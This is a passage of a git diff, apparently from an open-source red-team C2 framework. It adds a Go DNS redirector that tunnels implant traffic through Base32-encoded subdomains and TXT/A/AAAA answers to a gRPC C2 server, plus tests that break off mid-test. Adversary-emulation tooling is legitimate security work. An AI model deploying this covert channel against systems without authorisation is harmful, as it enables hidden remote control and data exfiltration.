method code (e.g., "ct", "fa") + uint32 total_chunks = 2; // Total number of data chunks to expect + uint32 data_crc32 = 3; // CRC32 checksum of complete request data + uint32 file_size = 4; // Total size of the file/data in bytes +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +message FetchPayload { + uint32 chunk_index = 1; // Which chunk to fetch (1-based) +} + +// ResponseMetadata indicates the response is chunked and must be fetched +message ResponseMetadata { + uint32 total_chunks = 1; // Total number of response chunks + uint32 data_crc32 = 2; // CRC32 checksum of complete response data + uint32 chunk_size = 3; // Size of each chunk (last may be smaller) +} diff --git a/tavern/internal/ent/beacon/beacon.go b/tavern/internal/ent/beacon/beacon.go index d899a6428..d0803c2cb 100644 --- a/tavern/internal/ent/beacon/beacon.go +++ b/tavern/internal/ent/beacon/beacon.go @@ -128,7 +128,7 @@ var ( // TransportValidator is a validator for the "transport" field enum values. It is called by the builders before save. func TransportValidator(t c2pb.Beacon_Transport) error { switch t.String() { - case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED": + case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED": return nil default: return fmt.Errorf("beacon: invalid enum value for transport field: %q", t) diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index d1a262d48..78c9db8ba 100644 --- a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -21,7 +21,7 @@ var ( {Name: "last_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "next_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "interval", Type: field.TypeUint64, Nullable: true}, - {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED"}}, + {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED"}}, {Name: "beacon_host", Type: field.TypeInt}, } // BeaconsTable holds the schema information for the "beacons" table. diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go new file mode 100644 index 000000000..55269f055 --- /dev/null +++ b/tavern/internal/redirectors/dns/dns.go @@ -0,0 +1,906 @@ +package dns + +import ( + "context" + "encoding/base32" + "encoding/binary" + "errors" + "fmt" + "hash/crc32" + "io" + "log/slog" + "net" + "net/url" + "sort" + "strings" + "sync" + "sync/atomic" + "time" + + "google.golang.org/grpc" + "google.golang.org/grpc/metadata" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" + "realm.pub/tavern/internal/redirectors" +) + +const ( + convTimeout = 15 * time.Minute + defaultUDPPort = "53" + + // DNS protocol constants + dnsHeaderSize = 12 + maxLabelLength = 63 + txtRecordType = 16 + aRecordType = 1 + aaaaRecordType = 28 + dnsClassIN = 1 + dnsTTLSeconds = 60 + + // DNS response flags + dnsResponseFlags = 0x8180 + dnsErrorFlags = 0x8183 + dnsPointer = 0xC00C + + txtMaxChunkSize = 255 + + // Benign DNS response configuration + // IP address returned for non-C2 A record queries to avoid NXDOMAIN responses + // which can interfere with recursive DNS lookups (e.g., Cloudflare) + benignARecordIP = "0.0.0.0" + + // Async protocol configuration + MaxActiveConversations = 10000 + NormalConversationTimeout = 15 * time.Minute + ReducedConversationTimeout = 5 * time.Minute + CapacityRecoveryThreshold = 0.5 // 50% + MaxAckRangesInResponse = 20 + MaxNacksInResponse = 50 + MaxDataSize = 50 * 1024 * 1024 // 50MB max data size +) + +func init() { + redirectors.Register("dns", &Redirector{}) +} + +// Redirector handles DNS-based C2 communication +type Redirector struct { + conversations sync.Map + baseDomains []string + conversationCount int32 + conversationTimeout time.Duration +} + +// Conversation tracks state for a request-response exchange +type Conversation struct { + mu sync.Mutex + ID string + MethodPath string + TotalChunks uint32 + ExpectedCRC uint32 + ExpectedDataSize uint32 // Data size provided by client + Chunks map[uint32][]byte + LastActivity time.Time + ResponseData []byte + ResponseChunks [][]byte // Split response for multi-fetch + ResponseCRC uint32 + Completed bool // Set to true when all chunks received +} + +func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { + listenAddr, domains, err := ParseListenAddr(listenOn) + if err != nil { + return fmt.Errorf("failed to parse listen address: %w", err) + } + + if len(domains) == 0 { + return fmt.Errorf("no base domains specified in listenOn parameter") + } + + r.baseDomains = domains + r.conversationTimeout = NormalConversationTimeout + + udpAddr, err := net.ResolveUDPAddr("udp", listenAddr) + if err != nil { + return fmt.Errorf("failed to resolve UDP address: %w", err) + } + + conn, err := net.ListenUDP("udp", udpAddr) + if err != nil { + return fmt.Errorf("failed to listen on UDP: %w", err) + } + defer conn.Close() + + slog.Info("DNS redirector started", "listen_on", listenAddr, "base_domains", r.baseDomains) + + go r.cleanupConversations(ctx) + + buf := make([]byte, 4096) + for { + select { + case <-ctx.Done(): + return ctx.Err() + default: + conn.SetReadDeadline(time.Now().Add(1 * time.Second)) + + n, addr, err := conn.ReadFromUDP(buf) + if err != nil { + if netErr, ok := err.(net.Error); ok && netErr.Timeout() { + continue + } + slog.Error("failed to read UDP", "error", err) + continue + } + + // Process query synchronously + queryCopy := make([]byte, n) + copy(queryCopy, buf[:n]) + r.handleDNSQuery(ctx, conn, addr, queryCopy, upstream) + } + } +} + +// ParseListenAddr extracts address and domain parameters from listenOn string +func ParseListenAddr(listenOn string) (string, []string, error) { + parts := strings.SplitN(listenOn, "?", 2) + addr := parts[0] + + if !strings.Contains(addr, ":") { + addr = net.JoinHostPort(addr, defaultUDPPort) + } + + if len(parts) == 1 { + return addr, nil, nil + } + + queryParams := parts[1] + domains := []string{} + + for _, param := range strings.Split(queryParams, "&") { + kv := strings.SplitN(param, "=", 2) + if len(kv) != 2 { + continue + } + + key := kv[0] + value := kv[1] + + if key == "domain" && value != "" { + decoded, err := url.QueryUnescape(value) + if err != nil { + return "", nil, fmt.Errorf("failed to decode domain: %w", err) + } + domains = append(domains, decoded) + } + } + + return addr, domains, nil +} + +func (r *Redirector) cleanupConversations(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + now := time.Now() + count := atomic.LoadInt32(&r.conversationCount) + + // Adjust timeout based on capacity + if count >= MaxActiveConversations { + r.conversationTimeout = ReducedConversationTimeout + } else if float64(count) < float64(MaxActiveConversations)*CapacityRecoveryThreshold { + r.conversationTimeout = NormalConversationTimeout + } + + r.conversations.Range(func(key, value interface{}) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > r.conversationTimeout { + r.conversations.Delete(key) + atomic.AddInt32(&r.conversationCount, -1) + } + conv.mu.Unlock() + return true + }) + } + } +} + +func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr *net.UDPAddr, query []byte, upstream *grpc.ClientConn) { + if len(query) < dnsHeaderSize { + slog.Debug("query too short") + return + } + + transactionID := binary.BigEndian.Uint16(query[0:2]) + + domain, queryType, err := r.parseDomainNameAndType(query[dnsHeaderSize:]) + if err != nil { + slog.Debug("failed to parse domain", "error", err) + return + } + + domain = strings.ToLower(domain) + + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + + // Extract subdomain + subdomain, err := r.extractSubdomain(domain) + if err != nil { + slog.Debug("domain doesn't match base domains", "domain", domain) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Decode packet + packet, err := r.decodePacket(subdomain) + if err != nil { + slog.Debug("ignoring non-C2 query", "domain", domain, "error", err) + + // For A record queries, return benign IP instead of NXDOMAIN + // Cloudflare does recursive lookups on subdomain components - if we return NXDOMAIN + // for the parent subdomain, it won't forward the full TXT query + if queryType == aRecordType { + slog.Debug("returning benign A record for non-C2 subdomain", "domain", domain) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) + return + } + + // For other types, return NXDOMAIN + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Validate packet type before processing + if packet.Type == dnspb.PacketType_PACKET_TYPE_UNSPECIFIED { + slog.Debug("ignoring packet with unspecified type", "domain", domain) + + if queryType == aRecordType { + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) + return + } + + r.sendErrorResponse(conn, addr, transactionID) + return + } + + slog.Debug("parsed packet", "type", packet.Type, "seq", packet.Sequence, "conv_id", packet.ConversationId) + + // Handle packet based on type + var responseData []byte + switch packet.Type { + case dnspb.PacketType_PACKET_TYPE_INIT: + responseData, err = r.handleInitPacket(packet) + case dnspb.PacketType_PACKET_TYPE_DATA: + responseData, err = r.handleDataPacket(ctx, upstream, packet, queryType) + case dnspb.PacketType_PACKET_TYPE_FETCH: + responseData, err = r.handleFetchPacket(packet) + default: + err = fmt.Errorf("unknown packet type: %d", packet.Type) + } + + if err != nil { + slog.Warn("packet handling failed", "type", packet.Type, "conv_id", packet.ConversationId, "error", err) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, responseData) +} + +func (r *Redirector) extractSubdomain(domain string) (string, error) { + domainParts := strings.Split(domain, ".") + + for _, baseDomain := range r.baseDomains { + baseDomainParts := strings.Split(baseDomain, ".") + + if len(domainParts) <= len(baseDomainParts) { + continue + } + + domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] + matched := true + for i, part := range baseDomainParts { + if !strings.EqualFold(part, domainSuffix[i]) { + matched = false + break + } + } + + if matched { + subdomainParts := domainParts[:len(domainParts)-len(baseDomainParts)] + return strings.Join(subdomainParts, "."), nil + } + } + + return "", fmt.Errorf("no matching base domain") +} + +func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { + encodedData := strings.ReplaceAll(subdomain, ".", "") + + packetData, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(strings.ToUpper(encodedData)) + if err != nil { + return nil, fmt.Errorf("failed to decode Base32 data: %w", err) + } + + var packet dnspb.DNSPacket + if err := proto.Unmarshal(packetData, &packet); err != nil { + return nil, fmt.Errorf("failed to unmarshal protobuf: %w", err) + } + + // Verify CRC for data packets + if packet.Type == dnspb.PacketType_PACKET_TYPE_DATA && len(packet.Data) > 0 { + actualCRC := crc32.ChecksumIEEE(packet.Data) + if actualCRC != packet.Crc32 { + return nil, fmt.Errorf("CRC mismatch: expected %d, got %d", packet.Crc32, actualCRC) + } + } + + return &packet, nil +} + +// handleInitPacket processes INIT packet +func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { + for { + current := atomic.LoadInt32(&r.conversationCount) + if current >= MaxActiveConversations { + return nil, fmt.Errorf("max active conversations reached: %d", current) + } + if atomic.CompareAndSwapInt32(&r.conversationCount, current, current+1) { + break + } + } + + var initPayload dnspb.InitPayload + if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { + atomic.AddInt32(&r.conversationCount, -1) + return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) + } + + // Validate file size from client + if initPayload.FileSize > MaxDataSize { + atomic.AddInt32(&r.conversationCount, -1) + return nil, fmt.Errorf("data size exceeds maximum: %d > %d bytes", initPayload.FileSize, MaxDataSize) + } + + if initPayload.FileSize == 0 && initPayload.TotalChunks > 0 { + slog.Warn("INIT packet missing file_size field", "conv_id", packet.ConversationId, "total_chunks", initPayload.TotalChunks) + } + + slog.Debug("creating conversation", "conv_id", packet.ConversationId, "method", initPayload.MethodCode, + "total_chunks", initPayload.TotalChunks, "file_size", initPayload.FileSize, "crc32", initPayload.DataCrc32) + + conv := &Conversation{ + ID: packet.ConversationId, + MethodPath: initPayload.MethodCode, + TotalChunks: initPayload.TotalChunks, + ExpectedCRC: initPayload.DataCrc32, + ExpectedDataSize: initPayload.FileSize, + Chunks: make(map[uint32][]byte), + LastActivity: time.Now(), + Completed: false, + } + + r.conversations.Store(packet.ConversationId, conv) + + slog.Debug("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, + "total_chunks", conv.TotalChunks, "data_size", initPayload.FileSize) + + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: []*dnspb.AckRange{}, + Nacks: []uint32{}, + } + statusData, err := proto.Marshal(statusPacket) + if err != nil { + atomic.AddInt32(&r.conversationCount, -1) + r.conversations.Delete(packet.ConversationId) + return nil, fmt.Errorf("failed to marshal init status: %w", err) + } + return statusData, nil +} + +// handleDataPacket processes DATA packet +func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) + if !ok { + slog.Debug("DATA packet for unknown conversation (INIT may be lost/delayed)", + "conv_id", packet.ConversationId, "seq", packet.Sequence) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) + } + + conv := val.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + if packet.Sequence < 1 || packet.Sequence > conv.TotalChunks { + return nil, fmt.Errorf("sequence out of bounds: %d (expected 1-%d)", packet.Sequence, conv.TotalChunks) + } + + conv.Chunks[packet.Sequence] = packet.Data + conv.LastActivity = time.Now() + + slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) + + if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { + conv.Completed = true + slog.Debug("C2 request complete, forwarding to upstream", "conv_id", conv.ID, + "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", conv.ExpectedDataSize) + + conv.mu.Unlock() + if err := r.processCompletedConversation(ctx, upstream, conv, queryType); err != nil { + slog.Error("failed to process completed conversation", "conv_id", conv.ID, "error", err) + } + conv.mu.Lock() + } + + acks, nacks := r.computeAcksNacks(conv) + + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: acks, + Nacks: nacks, + } + + statusData, err := proto.Marshal(statusPacket) + if err != nil { + return nil, fmt.Errorf("failed to marshal status packet: %w", err) + } + + return statusData, nil +} + +// processCompletedConversation reassembles data, verifies CRC, forwards to upstream, and stores response +func (r *Redirector) processCompletedConversation(ctx context.Context, upstream *grpc.ClientConn, conv *Conversation, queryType uint16) error { + conv.mu.Lock() + defer conv.mu.Unlock() + + // Reassemble data + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + chunk, ok := conv.Chunks[i] + if !ok { + return fmt.Errorf("missing chunk %d", i) + } + fullData = append(fullData, chunk...) + } + + actualCRC := crc32.ChecksumIEEE(fullData) + if actualCRC != conv.ExpectedCRC { + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) + } + + slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) + + if conv.ExpectedDataSize > 0 && uint32(len(fullData)) != conv.ExpectedDataSize { + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("reassembled data size mismatch: expected %d bytes, got %d bytes", conv.ExpectedDataSize, len(fullData)) + } + + responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) + if err != nil { + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("failed to forward to upstream: %w", err) + } + + var maxSize int + switch queryType { + case txtRecordType: + maxSize = 400 + case aRecordType: + maxSize = 64 + case aaaaRecordType: + maxSize = 128 + default: + maxSize = 400 + } + + if len(responseData) > maxSize { + conv.ResponseCRC = crc32.ChecksumIEEE(responseData) + conv.ResponseData = responseData + + conv.ResponseChunks = nil + for i := 0; i < len(responseData); i += maxSize { + end := i + maxSize + if end > len(responseData) { + end = len(responseData) + } + conv.ResponseChunks = append(conv.ResponseChunks, responseData[i:end]) + } + + conv.LastActivity = time.Now() + + slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), + "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) + } else { + conv.ResponseData = responseData + conv.LastActivity = time.Now() + + slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + } + + return nil +} + +// computeAcksNacks computes ACK ranges and NACK list for a conversation +// Must be called with conv.mu locked +func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, []uint32) { + received := make([]uint32, 0, len(conv.Chunks)) + for seq := range conv.Chunks { + received = append(received, seq) + } + sort.Slice(received, func(i, j int) bool { return received[i] < received[j] }) + + // Compute ACK ranges + acks := []*dnspb.AckRange{} + if len(received) > 0 { + start := received[0] + end := received[0] + + for i := 1; i < len(received); i++ { + if received[i] == end+1 { + end = received[i] + } else { + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) + start = received[i] + end = received[i] + } + } + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) + } + + if len(acks) > MaxAckRangesInResponse { + acks = acks[:MaxAckRangesInResponse] + } + + nacks := []uint32{} + + if len(received) > 0 { + minReceived := received[0] + maxReceived := received[len(received)-1] + + receivedSet := make(map[uint32]bool) + for _, seq := range received { + receivedSet[seq] = true + } + + for seq := minReceived; seq <= maxReceived; seq++ { + if !receivedSet[seq] { + nacks = append(nacks, seq) + if len(nacks) >= MaxNacksInResponse { + break + } + } + } + } + + return acks, nacks +} + +// handleFetchPacket processes FETCH packet +func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) + if !ok { + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) + } + + conv := val.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + if conv.ResponseData == nil { + return nil, fmt.Errorf("no response data available") + } + + conv.LastActivity = time.Now() + + if len(conv.ResponseChunks) > 0 { + if len(packet.Data) == 0 { + metadata := &dnspb.ResponseMetadata{ + TotalChunks: uint32(len(conv.ResponseChunks)), + DataCrc32: conv.ResponseCRC, + ChunkSize: uint32(len(conv.ResponseChunks[0])), + } + metadataBytes, err := proto.Marshal(metadata) + if err != nil { + return nil, fmt.Errorf("failed to marshal metadata: %w", err) + } + + slog.Debug("returning response metadata", "conv_id", conv.ID, "total_chunks", len(conv.ResponseChunks), + "total_size", len(conv.ResponseData), "crc32", conv.ResponseCRC) + + return metadataBytes, nil + } + + var fetchPayload dnspb.FetchPayload + if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) + } + + chunkIndex := int(fetchPayload.ChunkIndex) - 1 + + if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { + return nil, fmt.Errorf("invalid chunk index: %d (expected 1-%d)", fetchPayload.ChunkIndex, len(conv.ResponseChunks)) + } + + slog.Debug("returning response chunk", "conv_id", conv.ID, "chunk", fetchPayload.ChunkIndex, + "size", len(conv.ResponseChunks[chunkIndex]), "total_chunks", len(conv.ResponseChunks)) + + return conv.ResponseChunks[chunkIndex], nil + } + + slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) + + return conv.ResponseData, nil +} + +// forwardToUpstream sends request to gRPC server and returns response +func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { + md := metadata.New(map[string]string{}) + ctx = metadata.NewOutgoingContext(ctx, md) + + isClientStreaming := methodPath == "/c2.C2/ReportFile" + isServerStreaming := methodPath == "/c2.C2/FetchAsset" + + stream, err := upstream.NewStream(ctx, &grpc.StreamDesc{ + StreamName: methodPath, + ServerStreams: isServerStreaming, + ClientStreams: isClientStreaming, + }, methodPath, grpc.CallContentSubtype("raw")) + if err != nil { + return nil, fmt.Errorf("failed to create stream: %w", err) + } + + if isClientStreaming { + offset := 0 + chunkCount := 0 + for offset < len(requestData) { + if offset+4 > len(requestData) { + break + } + + msgLen := binary.BigEndian.Uint32(requestData[offset : offset+4]) + offset += 4 + + if offset+int(msgLen) > len(requestData) { + return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) + } + + chunk := requestData[offset : offset+int(msgLen)] + if err := stream.SendMsg(chunk); err != nil { + return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) + } + + offset += int(msgLen) + chunkCount++ + } + + slog.Debug("sent client streaming chunks", "method", methodPath, "chunks", chunkCount) + } else { + if err := stream.SendMsg(requestData); err != nil { + return nil, fmt.Errorf("failed to send request: %w", err) + } + } + + if err := stream.CloseSend(); err != nil { + return nil, fmt.Errorf("failed to close send: %w", err) + } + + var responseData []byte + if isServerStreaming { + responseCount := 0 + for { + var msg []byte + err := stream.RecvMsg(&msg) + if err != nil { + if errors.Is(err, io.EOF) { + break + } + return nil, fmt.Errorf("failed to receive message: %w", err) + } + + if len(msg) > 0 { + lengthPrefix := make([]byte, 4) + binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) + responseData = append(responseData, lengthPrefix...) + responseData = append(responseData, msg...) + responseCount++ + } + } + slog.Debug("received server streaming responses", "method", methodPath, "count", responseCount) + } else { + if err := stream.RecvMsg(&responseData); err != nil { + return nil, fmt.Errorf("failed to receive response: %w", err) + } + } + + return responseData, nil +} + +// parseDomainNameAndType extracts domain name and query type +func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { + var labels []string + offset := 0 + + for offset < len(data) { + length := int(data[offset]) + if length == 0 { + break + } + offset++ + + if offset+length > len(data) { + return "", 0, fmt.Errorf("invalid domain name") + } + + label := string(data[offset : offset+length]) + labels = append(labels, label) + offset += length + } + + offset++ + + if offset+2 > len(data) { + return "", 0, fmt.Errorf("query too short for type field") + } + + queryType := binary.BigEndian.Uint16(data[offset : offset+2]) + domain := strings.Join(labels, ".") + + return domain, queryType, nil +} + +// sendDNSResponse sends a DNS response with appropriate record type (TXT/A/AAAA) +// For A/AAAA records with data larger than 4/16 bytes, multiple answer records are sent +func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16, data []byte) { + if queryType == aRecordType || queryType == aaaaRecordType { + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) + data = []byte(encoded) + } + + var recordSize int + var answerCount uint16 + + switch queryType { + case txtRecordType: + recordSize = 0 + answerCount = 1 + case aRecordType: + recordSize = 4 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + case aaaaRecordType: + recordSize = 16 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + default: + recordSize = 0 + answerCount = 1 + } + + response := make([]byte, 0, 512) + + // DNS Header + response = append(response, byte(transactionID>>8), byte(transactionID)) + response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, byte(answerCount>>8), byte(answerCount&0xFF)) // Answers: multiple for A/AAAA + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 + + for _, label := range strings.Split(domain, ".") { + if len(label) == 0 { + continue + } + response = append(response, byte(len(label))) + response = append(response, []byte(label)...) + } + response = append(response, 0x00) // End of domain + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: original query type + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + + switch queryType { + case txtRecordType: + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: TXT + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + var rdata []byte + if len(data) == 0 { + rdata = []byte{0x00} + } else { + tempData := data + for len(tempData) > 0 { + chunkSize := len(tempData) + if chunkSize > txtMaxChunkSize { + chunkSize = txtMaxChunkSize + } + rdata = append(rdata, byte(chunkSize)) + rdata = append(rdata, tempData[:chunkSize]...) + tempData = tempData[chunkSize:] + } + } + + response = append(response, byte(len(rdata)>>8), byte(len(rdata))) + response = append(response, rdata...) + + case aRecordType: + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aRecordType)) // Type: A + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + response = append(response, 0x00, 0x04) + + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 4) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) + } + + case aaaaRecordType: + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aaaaRecordType)) // Type: AAAA + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + response = append(response, 0x00, 0x10) + + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 16) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) + } + + default: + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: match query + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + response = append(response, 0x00, 0x00) // RDLENGTH: 0 + } + + conn.WriteToUDP(response, addr) +} + +// sendErrorResponse sends a DNS error response +func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16) { + response := make([]byte, dnsHeaderSize) + binary.BigEndian.PutUint16(response[0:2], transactionID) + response[2] = byte(dnsErrorFlags >> 8) + response[3] = byte(dnsErrorFlags & 0xFF) + + conn.WriteToUDP(response, addr) +} diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go new file mode 100644 index 000000000..3bec7bc85 --- /dev/null +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -0,0 +1,993 @@ +package dns + +import ( + "context" + "encoding/base32" + "hash/crc32" + "net" + "sort" + "sync" + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" +) + +// TestParseListenAddr tests the ParseListenAddr function +func TestParseListenAddr(t *testing.T) { + tests := []struct { + name string + input string + expectedAddr string + expectedDomains []string + expectError bool + }{ + { + name: "default port with multiple domains", + input: "0.0.0.0?domain=dnsc2.realm.pub&domain=foo.bar", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"dnsc2.realm.pub", "foo.bar"}, + }, + { + name: "custom port with single domain", + input: "127.0.0.1:8053?domain=dnsc2.realm.pub", + expectedAddr: "127.0.0.1:8053", + expectedDomains: []string{"dnsc2.realm.pub"}, + }, + { + name: "no query params", + input: "0.0.0.0:5353", + expectedAddr: "0.0.0.0:5353", + expectedDomains: nil, + }, + { + name: "empty domain value", + input: "0.0.0.0?domain=", + expectedAddr: "0.0.0.0:53", + expectedDomains: nil, + }, + { + name: "mixed valid and empty domains", + input: "0.0.0.0?domain=valid.com&domain=&domain=also.valid", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"valid.com", "also.valid"}, + }, + { + name: "malformed URL encoding", + input: "0.0.0.0?domain=%ZZ", + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + addr, domains, err := ParseListenAddr(tt.input) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedAddr, addr) + assert.ElementsMatch(t, tt.expectedDomains, domains) + }) + } +} + +// TestExtractSubdomain tests subdomain extraction from full domain names +func TestExtractSubdomain(t *testing.T) { + r := &Redirector{ + baseDomains: []string{"dnsc2.realm.pub", "foo.bar.com"}, + } + + tests := []struct { + name string + domain string + expectedSubdom string + expectError bool + }{ + { + name: "simple subdomain", + domain: "test.dnsc2.realm.pub", + expectedSubdom: "test", + }, + { + name: "multi-label subdomain", + domain: "a.b.c.dnsc2.realm.pub", + expectedSubdom: "a.b.c", + }, + { + name: "subdomain with longer base domain", + domain: "test.foo.bar.com", + expectedSubdom: "test", + }, + { + name: "no matching base domain", + domain: "test.unknown.com", + expectError: true, + }, + { + name: "only base domain (no subdomain)", + domain: "dnsc2.realm.pub", + expectError: true, + }, + { + name: "case insensitive match", + domain: "test.DNSC2.REALM.PUB", + expectedSubdom: "test", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + subdomain, err := r.extractSubdomain(tt.domain) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedSubdom, subdomain) + }) + } +} + +// TestDecodePacket tests Base32 decoding and protobuf unmarshaling +func TestDecodePacket(t *testing.T) { + r := &Redirector{} + + t.Run("valid INIT packet", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + Sequence: 0, + ConversationId: "test1234", + Data: []byte{0x01, 0x02, 0x03}, + } + packetBytes, err := proto.Marshal(packet) + 